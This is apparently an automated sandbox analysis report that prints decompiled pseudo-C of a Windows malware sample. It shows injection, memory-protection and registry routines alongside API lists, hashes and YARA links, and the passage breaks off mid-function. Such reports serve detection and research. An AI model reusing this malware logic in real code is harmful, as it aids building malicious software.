                              Function 013E3A19, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29sleepmemoryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 50%
                              			E013E3A19(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x13ed35c; // 0x3ad95b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x13ed35c; // 0x3ad95b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x13ed030) {
					HeapFree( *0x13ed270, 0, _t8);
				}
				_t9 = E013E311C(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0x13ed35c; // 0x3ad95b0
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}











                              0x013e3a19
                              0x013e3a19
                              0x013e3a22
                              0x013e3a32
                              0x013e3a32
                              0x013e3a37
                              0x013e3a3c
                              0x00000000
                              0x00000000
                              0x013e3a2c
                              0x013e3a2c
                              0x013e3a3e
                              0x013e3a42
                              0x013e3a54
                              0x013e3a54
                              0x013e3a5f
                              0x013e3a64
                              0x013e3a67
                              0x013e3a6c
                              0x013e3a70
                              0x013e3a76

                              APIs
                              • RtlEnterCriticalSection.NTDLL(03AD9570), ref: 013E3A22
                              • Sleep.KERNEL32(0000000A), ref: 013E3A2C
                              • HeapFree.KERNEL32(00000000,00000000), ref: 013E3A54
                              • RtlLeaveCriticalSection.NTDLL(03AD9570), ref: 013E3A70
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                              • String ID: Uxt
                              • API String ID: 58946197-1536154274
                              • Opcode ID: eba8e0075a2efe55c31d0d0e801abe0f74b42cfac4a19526a466e22311c30989
                              • Instruction ID: 06bab1e1c12c593a098f4c30096e5474e7784e8aa7568371b11ed9c263b48948
                              • Opcode Fuzzy Hash: eba8e0075a2efe55c31d0d0e801abe0f74b42cfac4a19526a466e22311c30989
                              • Instruction Fuzzy Hash: 82F0B271600351AFEB319FA8E849B1A7BF8BB12348F089404E902CB2D5D620E854CB25
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E587D, Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 64%
                              			E013E587D(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t35;
				CHAR* _t41;
				CHAR* _t42;
				CHAR* _t43;
				void* _t48;
				void* _t50;
				signed char _t55;
				intOrPtr _t57;
				signed int _t58;
				void* _t62;
				CHAR* _t66;
				CHAR* _t67;
				char* _t68;
				void* _t69;

				_t60 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E013E6DCB();
				if(_t21 != 0) {
					_t58 =  *0x13ed294; // 0x2000000a
					_t54 = (_t58 & 0xf0000000) + _t21;
					 *0x13ed294 = (_t58 & 0xf0000000) + _t21;
				}
				_t22 =  *0x13ed12c(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E013E5203( &_v8,  &_v20); // executed
					_t53 = _t25;
					_t26 =  *0x13ed2b8; // 0x26ea5a8
					if( *0x13ed294 > 5) {
						_t8 = _t26 + 0x13ee5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x13ee9d9; // 0x44283a44
						_t27 = _t7;
					}
					E013E3D42(_t27, _t27);
					_t31 = E013E5C7F(_t60,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t53 != _t62) {
						 *0x13ed2a8 =  *0x13ed2a8 ^ 0x81bbe65d;
						_t32 = E013E55DC(0x60);
						__eflags = _t32;
						 *0x13ed35c = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t48 =  *0x13ed35c; // 0x3ad95b0
							_t69 = _t69 + 0xc;
							__imp__(_t48 + 0x40);
							_t50 =  *0x13ed35c; // 0x3ad95b0
							 *_t50 = 0x13ee823;
						}
						__eflags = 0;
						_t53 = 0;
						if(0 == 0) {
							_t35 = RtlAllocateHeap( *0x13ed270, 0, 0x43);
							__eflags = _t35;
							 *0x13ed300 = _t35;
							if(_t35 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t55 =  *0x13ed294; // 0x2000000a
								_t60 = _t55 & 0x000000ff;
								_t57 =  *0x13ed2b8; // 0x26ea5a8
								_t13 = _t57 + 0x13ee55a; // 0x697a6f4d
								_t54 = _t13;
								wsprintfA(_t35, _t13, _t55 & 0x000000ff, _t55 & 0x000000ff, 0x13ec2a7);
							}
							__eflags = 0;
							_t53 = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E013EA303( ~_v8 &  *0x13ed2a8, 0x13ed00c); // executed
								_t41 = E013E294D(0, _t54, _t62, 0x13ed00c); // executed
								_t53 = _t41;
								__eflags = _t53;
								if(_t53 != 0) {
									goto L30;
								}
								_t42 = E013E2551();
								__eflags = _t42;
								if(_t42 != 0) {
									__eflags = _v8;
									_t66 = _v12;
									if(_v8 != 0) {
										L29:
										_t43 = E013E5038(_t60, _t66, _v8); // executed
										_t53 = _t43;
										goto L30;
									}
									__eflags = _t66;
									if(__eflags == 0) {
										goto L30;
									}
									_t53 = E013E8BA7(__eflags,  &(_t66[4]));
									__eflags = _t53;
									if(_t53 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t53 = 8;
							}
						}
					} else {
						_t67 = _v12;
						if(_t67 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								E013ED128(); // executed
							}
							goto L34;
						}
						_t68 =  &(_t67[4]);
						do {
						} while (E013E62E1(_t62, _t68, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t53 = _t22;
					L34:
					return _t53;
				}
			}































                              0x013e587d
                              0x013e5887
                              0x013e588a
                              0x013e588d
                              0x013e5890
                              0x013e5897
                              0x013e5899
                              0x013e58a5
                              0x013e58a7
                              0x013e58a7
                              0x013e58b0
                              0x013e58b8
                              0x013e58bb
                              0x013e58d5
                              0x013e58e1
                              0x013e58e3
                              0x013e58e8
                              0x013e58f2
                              0x013e58f2
                              0x013e58ea
                              0x013e58ea
                              0x013e58ea
                              0x013e58ea
                              0x013e58f9
                              0x013e5906
                              0x013e590d
                              0x013e5912
                              0x013e5912
                              0x013e591b
                              0x013e591e
                              0x013e5944
                              0x013e5950
                              0x013e5955
                              0x013e5957
                              0x013e595c
                              0x013e5988
                              0x013e598a
                              0x013e595e
                              0x013e5962
                              0x013e5967
                              0x013e596c
                              0x013e5973
                              0x013e5979
                              0x013e597e
                              0x013e5984
                              0x013e598b
                              0x013e598d
                              0x013e598f
                              0x013e599e
                              0x013e59a4
                              0x013e59a6
                              0x013e59ab
                              0x013e59db
                              0x013e59dd
                              0x013e59ad
                              0x013e59ad
                              0x013e59b3
                              0x013e59c0
                              0x013e59c6
                              0x013e59c6
                              0x013e59ce
                              0x013e59d7
                              0x013e59de
                              0x013e59e0
                              0x013e59e2
                              0x013e59e9
                              0x013e59f6
                              0x013e59fb
                              0x013e5a00
                              0x013e5a02
                              0x013e5a04
                              0x00000000
                              0x00000000
                              0x013e5a06
                              0x013e5a0b
                              0x013e5a0d
                              0x013e5a14
                              0x013e5a18
                              0x013e5a1b
                              0x013e5a30
                              0x013e5a34
                              0x013e5a39
                              0x00000000
                              0x013e5a39
                              0x013e5a1d
                              0x013e5a1f
                              0x00000000
                              0x00000000
                              0x013e5a2a
                              0x013e5a2c
                              0x013e5a2e
                              0x00000000
                              0x00000000
                              0x00000000
                              0x013e5a2e
                              0x013e5a11
                              0x013e5a11
                              0x013e59e2
                              0x013e5920
                              0x013e5920
                              0x013e5925
                              0x013e5a3b
                              0x013e5a40
                              0x013e5a48
                              0x013e5a48
                              0x00000000
                              0x013e5a40
                              0x013e592b
                              0x013e592e
                              0x013e5938
                              0x013e593f
                              0x00000000
                              0x013e5a50
                              0x013e5a50
                              0x013e5a53
                              0x013e5a57
                              0x013e5a57

                              APIs
                                • Part of subcall function 013E6DCB: GetModuleHandleA.KERNEL32(4C44544E,00000000,013E5895,00000001), ref: 013E6DDA
                              • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 013E5912
                                • Part of subcall function 013E55DC: RtlAllocateHeap.NTDLL(00000000,00000000,013E552C), ref: 013E55E8
                              • memset.NTDLL ref: 013E5962
                              • RtlInitializeCriticalSection.NTDLL(03AD9570), ref: 013E5973
                                • Part of subcall function 013E8BA7: memset.NTDLL ref: 013E8BC1
                                • Part of subcall function 013E8BA7: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 013E8C07
                                • Part of subcall function 013E8BA7: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 013E8C12
                              • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 013E599E
                              • wsprintfA.USER32 ref: 013E59CE
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                              • String ID:
                              • API String ID: 4246211962-0
                              • Opcode ID: 6e50d75149bb496e283e8c253af60c9e45acbd190bafdd4e9f6f87b4d18a7d8d
                              • Instruction ID: 4bf77adadafbc4ec9f5bd5c96ce0f67a8f64bc293481fcdc28b0e306f5ded126
                              • Opcode Fuzzy Hash: 6e50d75149bb496e283e8c253af60c9e45acbd190bafdd4e9f6f87b4d18a7d8d
                              • Instruction Fuzzy Hash: 3C51D975A10339ABEB329BE8DC8CB6E7BEDAB1471CF144426E501DB1C1E770D9458B50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E4B5B, Relevance: 7.6, APIs: 5, Instructions: 95synchronizationCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E013E4B5B(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				long _t14;
				void* _t18;
				WCHAR* _t19;
				long _t20;
				void* _t25;
				void* _t26;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				WCHAR** _t32;

				_t6 =  *0x13ed2a8; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x13ed2b8; // 0x26ea5a8
				_t3 = _t8 + 0x13ee876; // 0x61636f4c
				_t25 = 0;
				_t30 = E013E760A(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x13ed2e4, 1, 0, _t30);
					E013E6DFA(_t30);
				}
				_t12 =  *0x13ed294; // 0x2000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t14 = E013E87A1(_t32, _t26); // executed
					_t31 = _t14;
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t18 = E013E3309(); // executed
					if(_t18 != 0) {
						goto L12;
					}
					_t19 = StrChrW( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 =  &(_t19[1]);
					}
					_t20 = E013E62E1(0,  *_t32, _t19, 0); // executed
					_t31 = _t20;
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}


















                              0x013e4b5c
                              0x013e4b63
                              0x013e4b6d
                              0x013e4b71
                              0x013e4b77
                              0x013e4b86
                              0x013e4b8d
                              0x013e4b91
                              0x013e4ba3
                              0x013e4ba5
                              0x013e4ba5
                              0x013e4baa
                              0x013e4bb1
                              0x013e4c06
                              0x013e4c06
                              0x013e4c0c
                              0x013e4c0e
                              0x013e4c0e
                              0x013e4c13
                              0x013e4c18
                              0x013e4c1c
                              0x013e4c2e
                              0x013e4c2e
                              0x013e4c32
                              0x013e4c38
                              0x013e4c38
                              0x00000000
                              0x013e4bc1
                              0x013e4bc1
                              0x013e4bc8
                              0x00000000
                              0x00000000
                              0x013e4bcf
                              0x013e4bd7
                              0x013e4bd9
                              0x013e4bdd
                              0x013e4bdd
                              0x013e4be5
                              0x013e4bea
                              0x013e4bee
                              0x013e4bf2
                              0x013e4c47
                              0x013e4c4d
                              0x013e4c4d
                              0x013e4c00
                              0x013e4c04
                              0x013e4c3b
                              0x013e4c3d
                              0x013e4c40
                              0x013e4c40
                              0x00000000
                              0x013e4c3d
                              0x013e4c04
                              0x00000000
                              0x013e4bee

                              APIs
                                • Part of subcall function 013E760A: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,03AD9B78,00000000,?,?,69B25F44,00000005,013ED00C,4D283A53,?,?), ref: 013E7640
                                • Part of subcall function 013E760A: lstrcpy.KERNEL32(00000000,00000000), ref: 013E7664
                                • Part of subcall function 013E760A: lstrcat.KERNEL32(00000000,00000000), ref: 013E766C
                              • CreateEventA.KERNEL32(013ED2E4,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,013E60B5,?,?,?), ref: 013E4B9C
                                • Part of subcall function 013E6DFA: RtlFreeHeap.NTDLL(00000000,00000000,013E55CD,00000000,?,?,00000000), ref: 013E6E06
                              • StrChrW.SHLWAPI(013E60B5,00000020,61636F4C,00000001,00000000,?,?,00000000,?,013E60B5,?,?,?), ref: 013E4BCF
                              • WaitForSingleObject.KERNEL32(00000000,00004E20,013E60B5,00000000,00000000,?,00000000,?,013E60B5,?,?,?), ref: 013E4BFA
                              • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,013E60B5,?,?,?), ref: 013E4C28
                              • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,013E60B5,?,?,?), ref: 013E4C40
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                              • String ID:
                              • API String ID: 73268831-0
                              • Opcode ID: 27065e193f4e2f15fa717dafce28a6cf2e5e8bdb93c1f1a7d85b56862ef57481
                              • Instruction ID: 2965df122b27fb9f8f891918e5df86b26ed54e264adbdd5a69126bf34bf8e072
                              • Opcode Fuzzy Hash: 27065e193f4e2f15fa717dafce28a6cf2e5e8bdb93c1f1a7d85b56862ef57481
                              • Instruction Fuzzy Hash: 9C21E9726003316BEB319EAC5C8CB9B7ADDEB8C729F050215FA56DB1C5EB60DC114754
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 010432FF, Relevance: 7.6, APIs: 5, Instructions: 67registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 010364DE: RegCreateKeyA.ADVAPI32(80000001,04B3B7F0,04B38560), ref: 010364F3
                                • Part of subcall function 010364DE: lstrlen.KERNEL32(04B3B7F0,00000000,00000000,0104F072,?,?,?,0102FFEA,00000001,00000001,04B38560), ref: 0103651C
                              • RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,01023136,?), ref: 01043337
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 0104334B
                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,01023136,?), ref: 01043365
                              • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,01023136,?,?,?), ref: 01043381
                              • RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,?,?,01023136,?,?,?), ref: 0104338F
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: HeapQueryValue$AllocateCloseCreateFreelstrlen
                              • String ID:
                              • API String ID: 1633053242-0
                              • Opcode ID: ac5b5872e42614f7af076eb816820509ab60bd4ad10c8d68173f1e6bbf9b997d
                              • Instruction ID: 34b5fe7c3b2d93c0fdc7885e053e7cad61dfca12e8743db5013322928c88729f
                              • Opcode Fuzzy Hash: ac5b5872e42614f7af076eb816820509ab60bd4ad10c8d68173f1e6bbf9b997d
                              • Instruction Fuzzy Hash: B21137B6500219FFDB11AF98CCC4CAEBBAEFB88355B11406AF54197220DB329E549B60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E2EBD, Relevance: 7.5, APIs: 5, Instructions: 49threadinjectionCOMMON
                              Download Yara Rule
                              C-Code - Quality: 49%
                              			E013E2EBD(void* __ecx, void* __edi, intOrPtr _a4) {
				unsigned int _v8;
				void* _v12;
				long _t15;
				long _t16;
				signed int _t18;
				signed int _t19;
				unsigned int _t21;
				unsigned int _t26;

				asm("stosd");
				_v12 = _v12 | 0xffffffff;
				while(1) {
					_t15 = QueueUserAPC(E013E293E, GetCurrentThread(),  &_v12); // executed
					if(_t15 == 0) {
						break;
					}
					_t26 = _v8;
					_t18 = (_t26 << 0x00000020 | _v12) >> 5;
					_push(0);
					_push(0x13);
					_push(_t26 >> 5);
					_push(_t18);
					L013EB18E();
					_push(1);
					_t19 = 3;
					_t21 = SleepEx(_t19 << (_t18 & 0x00000007), ??); // executed
					_t16 = E013E54DF(_a4, (_t21 >> 6) + _t18);
					if(_t16 == 1) {
						continue;
					} else {
					}
					L5:
					return _t16;
				}
				_t16 = GetLastError();
				goto L5;
			}











                              0x013e2ec8
                              0x013e2ec9
                              0x013e2ecf
                              0x013e2edf
                              0x013e2ee7
                              0x00000000
                              0x00000000
                              0x013e2eec
                              0x013e2eef
                              0x013e2ef3
                              0x013e2ef5
                              0x013e2efa
                              0x013e2efb
                              0x013e2efc
                              0x013e2f03
                              0x013e2f09
                              0x013e2f10
                              0x013e2f1f
                              0x013e2f27
                              0x00000000
                              0x00000000
                              0x013e2f29
                              0x013e2f31
                              0x013e2f33
                              0x013e2f33
                              0x013e2f2b
                              0x00000000

                              APIs
                              • GetCurrentThread.KERNEL32 ref: 013E2ED3
                              • QueueUserAPC.KERNELBASE(013E293E,00000000,?,?,?,013E2348,?,?), ref: 013E2EDF
                              • _aullrem.NTDLL(000000FF,?,00000013,00000000), ref: 013E2EFC
                              • SleepEx.KERNELBASE(00000003,00000001,?,?,?,013E2348,?,?), ref: 013E2F10
                                • Part of subcall function 013E54DF: memcpy.NTDLL(00000000,?,?,?,?,?,?,?,00000000), ref: 013E553E
                              • GetLastError.KERNEL32(?,?,?,013E2348,?,?), ref: 013E2F2B
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: CurrentErrorLastQueueSleepThreadUser_aullremmemcpy
                              • String ID:
                              • API String ID: 2952296216-0
                              • Opcode ID: 0b9a511a52dffc42331d2baf11d17d858507d2b5da378d15ca53835e8f5817dc
                              • Instruction ID: 601ad8fc586015f7fd3bab5b905efc6c34b43e09a33b5acdf35eff1ec8d8f508
                              • Opcode Fuzzy Hash: 0b9a511a52dffc42331d2baf11d17d858507d2b5da378d15ca53835e8f5817dc
                              • Instruction Fuzzy Hash: 680167B2650314BBE7345AA8DC5EFAF7AECE741764F100115F602D61C4E5B0EA01C760
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01044E7E, Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualProtect.KERNELBASE(?,?,00000040,00000000,03AE75A8,?,00000000,03AE75A8,?,0102B24B,00000004,00000000), ref: 01044EA3
                              • GetLastError.KERNEL32(?,00000000,03AE75A8,?,0102B24B,00000004,00000000), ref: 01044EAB
                              • VirtualQuery.KERNEL32(?,03AE75A8,0000001C,?,00000000,03AE75A8,?,0102B24B,00000004,00000000), ref: 01044EC2
                              • VirtualProtect.KERNEL32(?,?,-2C9B417C,00000000,?,00000000,03AE75A8,?,0102B24B,00000004,00000000), ref: 01044EE7
                              • SetLastError.KERNEL32(?,?,00000000,03AE75A8,?,0102B24B,00000004,00000000), ref: 01044EF0
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Virtual$ErrorLastProtect$Query
                              • String ID:
                              • API String ID: 148356745-0
                              • Opcode ID: a4e35eb391d3723111112437d5fb27dc414924848ce1d8beea3fcd79b5cc8342
                              • Instruction ID: 18b70bff5f6cf3f5cbb3ebdb754f9b45c6797923da6aeac7095fec0547901d7f
                              • Opcode Fuzzy Hash: a4e35eb391d3723111112437d5fb27dc414924848ce1d8beea3fcd79b5cc8342
                              • Instruction Fuzzy Hash: B60129B6600209FFAF219F99CD84D9EBBB9EB0C3507004426FA82D3124D771D914DB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E4C56, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94memoryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E013E4C56(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E013E5EF5(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x13ed2b8; // 0x26ea5a8
				_t4 = _t24 + 0x13eee10; // 0x3ad93b8
				_t5 = _t24 + 0x13eedb8; // 0x4f0053
				_t26 = E013EA415( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x13ed2b8; // 0x26ea5a8
						_t11 = _t32 + 0x13eee04; // 0x3ad93ac
						_t48 = _t11;
						_t12 = _t32 + 0x13eedb8; // 0x4f0053
						_t52 = E013E5434(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x13ed2b8; // 0x26ea5a8
							_t13 = _t35 + 0x13eee4e; // 0x30314549
							if(E013E3A79(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0x13ed294 - 6;
								if( *0x13ed294 <= 6) {
									_t42 =  *0x13ed2b8; // 0x26ea5a8
									_t15 = _t42 + 0x13eed9a; // 0x52384549
									E013E3A79(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x13ed2b8; // 0x26ea5a8
							_t17 = _t38 + 0x13eee48; // 0x3ad93f0
							_t18 = _t38 + 0x13eee20; // 0x680043
							_t45 = E013E4FA0(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x13ed270, 0, _t52);
						}
					}
					HeapFree( *0x13ed270, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E013E7424(_t54);
				}
				return _t45;
			}


















                              0x013e4c56
                              0x013e4c66
                              0x013e4c69
                              0x013e4c70
                              0x013e4c72
                              0x013e4c72
                              0x013e4c75
                              0x013e4c7a
                              0x013e4c81
                              0x013e4c8e
                              0x013e4c93
                              0x013e4c97
                              0x013e4ca5
                              0x013e4cb3
                              0x013e4cb7
                              0x013e4d48
                              0x013e4d48
                              0x013e4cbd
                              0x013e4cbd
                              0x013e4cc2
                              0x013e4cc2
                              0x013e4cc9
                              0x013e4cd5
                              0x013e4cd7
                              0x013e4cd9
                              0x013e4cdb
                              0x013e4ce2
                              0x013e4cf4
                              0x013e4cf6
                              0x013e4cfd
                              0x013e4cff
                              0x013e4d06
                              0x013e4d11
                              0x013e4d11
                              0x013e4cfd
                              0x013e4d16
                              0x013e4d1b
                              0x013e4d22
                              0x013e4d40
                              0x013e4d42
                              0x013e4d42
                              0x013e4cd9
                              0x013e4d54
                              0x013e4d54
                              0x013e4d56
                              0x013e4d5b
                              0x013e4d5d
                              0x013e4d5d
                              0x013e4d68

                              APIs
                              • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,03AD93B8,00000000,?,747DF710,00000000,747DF730), ref: 013E4CA5
                              • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,03AD93F0,?,00000000,30314549,00000014,004F0053,03AD93AC), ref: 013E4D42
                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,013E50D9), ref: 013E4D54
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: FreeHeap
                              • String ID: Uxt
                              • API String ID: 3298025750-1536154274
                              • Opcode ID: b6698ed66231134e9e952625f13636d46a33ef3d40ce5ca857e81f8436e98ca7
                              • Instruction ID: 5448a6ee852e66d8774e58f00969ab22070dd9d378c1426f0c3ae102ee97dcf6
                              • Opcode Fuzzy Hash: b6698ed66231134e9e952625f13636d46a33ef3d40ce5ca857e81f8436e98ca7
                              • Instruction Fuzzy Hash: BD316F76900329BFDB31DFD8DC8CEAA7BFCEB48714F140065A604EB1E5D6719A488B50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E5B5B, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76memoryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 50%
                              			E013E5B5B(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t18;
				void* _t24;
				void* _t30;
				void* _t37;
				void* _t40;
				intOrPtr _t42;

				_t37 = __edx;
				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t42 =  *0x13ed370; // 0x3ad9b68
				_push(0x800);
				_push(0);
				_push( *0x13ed270);
				if( *0x13ed284 >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t30 = 8;
						L7:
						if(_t30 != 0) {
							L10:
							 *0x13ed284 =  *0x13ed284 + 1;
							L11:
							return _t30;
						}
						_t44 = _a4;
						_t40 = _v8;
						 *_a16 = _a4;
						 *_a20 = E013E47A4(_t44, _t40); // executed
						_t18 = E013E6A16(_t40, _t44); // executed
						if(_t18 != 0) {
							 *_a8 = _t40;
							 *_a12 = _t18;
							if( *0x13ed284 < 5) {
								 *0x13ed284 =  *0x13ed284 & 0x00000000;
							}
							goto L11;
						}
						_t30 = 0xbf;
						E013E55F1();
						HeapFree( *0x13ed270, 0, _t40);
						goto L10;
					}
					_t24 = E013E6367(_a4, _t32, _t37, _t42,  &_v8,  &_a4, _t13);
					L5:
					_t30 = _t24;
					goto L7;
				}
				if(RtlAllocateHeap() == 0) {
					goto L6;
				}
				_t24 = E013E7132(_a4, _t32, _t37, _t42,  &_v8,  &_a4, _t25);
				goto L5;
			}











                              0x013e5b5b
                              0x013e5b5b
                              0x013e5b5e
                              0x013e5b5f
